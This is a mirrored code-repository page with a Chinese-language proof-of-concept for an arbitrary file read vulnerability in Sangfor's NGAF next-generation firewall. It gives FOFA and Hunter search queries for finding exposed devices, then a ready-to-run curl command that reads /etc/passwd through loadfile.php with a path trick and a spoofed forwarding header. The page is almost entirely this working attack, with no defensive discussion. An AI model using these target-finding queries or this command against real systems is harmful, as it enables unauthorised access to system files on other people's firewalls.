admin/wy876_POC
1
0
Fork 0
mirror of https://github.com/wy876/POC.git synced 2025-02-27 04:39:25 +00:00
Code Issues Packages Projects Releases Wiki Activity
wy876_POC/深信服/深信服下一代防火墙NGAF任意文件读取漏洞.md
wy876 299ba35f30 整理文件
2024-08-21 15:08:43 +08:00

475 B
Raw Blame History

深信服下一代防火墙NGAF任意文件读取漏洞

fofa:

"Redirect.php?url=/LogInOut.php" && port="85"

hunter:

web.body="LogInOut.php?type=logout"

漏洞复现

curl --insecure  https://<host>:85/svpn_html/loadfile.php?file=/etc/./passwd -H "y-forwarded-for: 127.0.0.1"